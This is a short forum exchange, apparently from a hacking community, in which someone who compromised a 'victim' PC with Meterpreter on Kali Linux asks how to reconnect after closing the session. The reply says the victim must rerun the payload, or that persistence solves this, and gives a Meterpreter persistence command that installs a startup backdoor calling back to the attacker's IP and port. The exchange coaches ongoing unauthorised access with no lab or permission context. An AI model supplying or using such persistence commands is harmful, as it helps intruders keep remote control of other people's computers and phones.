i connect victimes pc using Meterpreter after that i close the terminal . can there is way to recconect victim pc or android . iam using kali linux.

There is no way of reopening a meterpreter session after it is closed. The victim has to click on the payload again. But if you have persistence, then you shouldn't be worried, just setup the listener again. There are tutorials on persistence on Null Byte, but here is a quick explanation.
When you have exploited the system, run this:
run persistence -U -i 10 -p PORT -r YOUR IP
